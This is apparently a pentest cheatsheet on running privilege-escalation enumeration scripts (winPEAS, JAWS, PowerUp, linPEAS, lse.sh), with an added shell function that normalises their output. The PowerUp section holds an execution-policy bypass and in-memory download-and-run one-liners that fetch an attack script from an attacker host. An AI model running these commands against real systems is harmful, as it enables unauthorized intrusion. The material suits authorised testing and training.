Enumeration scripts

For privilege escalation

Windows

winPEAS. Run from within a CMD shell and write the output to a file:

winpeas.exe cmd > winpeas.txt

If the capture is UTF-16LE (which is what a PowerShell redirect produces; a file that starts with the bytes ff fe), less will treat it as binary. Convert it to UTF-8 first, then read the coloured output with less -R:

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt
less -R winpeas-utf-8.txt

JAWS. Run from within a CMD shell and write the output to a file:

CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Run from within a PowerShell session and write the output to a file:

PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

Complete and official PowerUp documentation + great cheatsheet blog.

PowerUp. From a PowerShell session, with the script already downloaded to the target's disk.

To write the results to an HTML file add the -HTMLReport switch to Invoke-AllChecks.

PS C:\> powershell -ep bypass       # Execution policy bypass
PS C:\> Import-Module .\PowerUp.ps1 # Import the PowerUp module
PS C:\> Invoke-AllChecks            # Run every privilege-escalation check

Without touching the disk

PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<kali_ip>/PowerUp.ps1')
PS C:\> iex (iwr 'http://<kali_ip>/PowerUp.ps1') # PowerShell >= v3

Linux

# Output to a file
./linpeas.sh -a > linpeas.txt

# Read with less; -R renders the ANSI colour codes instead of showing them raw
less -R linpeas.txt
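The iconv step in the winPEAS section and the less -R step here are easy to get wrong: running iconv -f utf-16le on a file that is already UTF-8 (a cmd.exe redirect, or linpeas.txt) produces garbage, and the colour codes that less -R renders get in the way of grep and diff. The following shell function is an added example, not part of winPEAS, linPEAS or the original cheatsheet. It only converts when the UTF-16LE byte-order mark is present and writes a second, colour-stripped copy for grep. The function names, the .utf8 and .plain suffixes and the sample inputs are my own choices; it assumes iconv, sed, head, tail and od (GNU or busybox) on the attacker machine.

```shell
# Added example, not part of winPEAS/linPEAS or the original cheatsheet.
# Normalise an enumeration-script output file so it can be read with
# `less -R` and searched with grep. Assumes iconv, sed, head, tail and od
# (GNU or busybox) on the attacker machine.
#
# Two things this handles that the plain iconv one-liner does not:
#  * output redirected from a PowerShell prompt is UTF-16LE with a ff fe
#    byte-order mark, but output redirected from cmd.exe or linpeas.sh is
#    not; iconv -f utf-16le on the latter produces garbage, so the
#    conversion only runs when the BOM is present;
#  * the colour codes that `less -R` renders are ANSI escape sequences
#    that break grep and diff, so a stripped copy is written as well.

# is_utf16le FILE: succeed if FILE starts with the UTF-16LE BOM (ff fe).
is_utf16le() {
    [ "$(head -c 2 "$1" | od -An -tx1 | tr -d ' \n')" = "fffe" ]
}

# strip_ansi: read stdin, drop CSI sequences (ESC [ params final byte)
# and the trailing carriage returns of Windows line endings.
strip_ansi() {
    esc=$(printf '\033')
    cr=$(printf '\r')
    LC_ALL=C sed -e "s|${esc}\\[[0-?]*[ -/]*[@-~]||g" -e "s|${cr}\$||"
}

# peas_normalize FILE: write FILE.utf8 (UTF-8, colours kept, for less -R)
# and FILE.plain (colours stripped, for grep). Prints both paths.
peas_normalize() {
    src="$1"
    utf8="$1.utf8"
    plain="$1.plain"

    if is_utf16le "$src"; then
        # Drop the two BOM bytes first so iconv does not emit U+FEFF.
        tail -c +3 "$src" | iconv -f utf-16le -t utf-8 > "$utf8"
    else
        cp "$src" "$utf8"
    fi

    strip_ansi < "$utf8" > "$plain"
    printf '%s\n%s\n' "$utf8" "$plain"
}

# Typical use after pulling winpeas.txt or linpeas.txt back to Kali:
#   peas_normalize winpeas.txt && less -R winpeas.txt.utf8
#   grep -n -i 'password' winpeas.txt.plain
```

The BOM check is the important part: iconv has no way to tell an already-UTF-8 file from UTF-16LE, so it will happily turn a cmd.exe capture into nonsense if run unconditionally.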

Linux Smart Enumeration (lse.sh). Output to a file:

./lse.sh > lse.txt

Verbosity level

 -l LEVEL     Output verbosity level
                 0: Show highly important results. (default)
                 1: Show interesting results.
                 2: Show all gathered information.

Specific tests to run

-s SELECTION Comma separated list of sections or tests to run. Available
               sections:
                 usr: User related tests.
                 sud: Sudo related tests.
                 fst: File system related tests.
                 sys: System related tests.
                 sec: Security measures related tests.
                 ret: Recurrent tasks (cron, timers) related tests.
                 net: Network related tests.
                 srv: Services related tests.
                 pro: Processes related tests.
                 sof: Software related tests.
                 ctn: Container (docker, lxc) related tests.
                 cve: CVE related tests.

Specifically for kernel exploits

Linux Exploit Suggester and Linux Exploit Suggester 2
